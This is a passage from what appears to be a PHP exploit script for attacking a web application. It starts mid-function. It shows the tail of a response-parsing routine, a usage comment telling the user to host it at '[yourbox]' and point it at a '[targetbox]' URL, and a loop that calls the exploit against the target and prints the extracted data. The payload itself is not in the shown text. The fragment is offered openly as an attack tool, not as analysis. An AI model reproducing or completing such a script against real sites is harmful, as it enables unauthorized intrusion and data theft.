/', $request[$i], $response); if(!empty($response[1])) { return $response[1] . '
'; } } } # Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/ if(empty($_GET['target'])) { die('No target site specified!'); } else { for($c = 1; $c < 3; $c++) { echo exploit($_GET['target'], $c); } } ?>